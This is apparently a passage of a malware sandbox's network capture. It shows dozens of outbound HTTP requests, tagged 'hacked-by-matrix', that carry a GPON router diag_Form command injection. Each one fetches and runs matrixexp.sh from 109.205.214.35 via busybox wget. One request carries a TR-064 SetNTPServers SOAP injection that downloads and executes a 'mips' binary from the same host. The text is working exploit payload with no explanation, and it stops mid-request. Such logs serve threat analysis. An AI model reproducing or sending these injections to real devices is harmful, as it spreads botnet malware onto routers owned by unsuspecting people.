                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        934192.168.2.1344568212.146.238.116443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:08.686038017 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        935192.168.2.1342446109.237.76.11443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:08.686059952 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        936192.168.2.13474305.155.222.54443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:08.686085939 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        937192.168.2.13415245.194.164.5443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:08.686085939 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        938192.168.2.1348624212.80.10.40443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:08.686091900 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        939192.168.2.13469465.40.222.75443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:08.686140060 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        940192.168.2.1347570212.99.57.6443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:08.686140060 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        941192.168.2.13459425.72.1.218443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:08.686141014 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        942192.168.2.1344818109.20.88.206443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:08.686148882 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        943192.168.2.1337788212.35.129.113443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:08.686150074 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        944192.168.2.1341408109.93.90.67443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:08.686170101 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        945192.168.2.135607642.107.81.64443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:08.686177969 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        946192.168.2.133300642.103.35.191443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:08.686258078 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        947192.168.2.1360060175.238.89.1347547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:08.686270952 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        948192.168.2.1355980118.65.13.27443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:08.686284065 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        949192.168.2.1338240109.149.247.94443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:08.686285019 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        950192.168.2.1351530118.184.34.114443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:08.686285973 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        951192.168.2.1342314212.121.92.133443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:08.686290026 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        952192.168.2.1343522118.40.84.50443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:08.686312914 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        953192.168.2.1346836212.254.197.55443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:08.686325073 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        954192.168.2.135962642.125.100.114443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:08.686382055 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        955192.168.2.1344428212.89.152.233443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:08.686391115 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        956192.168.2.1336042212.189.164.30443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:08.686400890 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
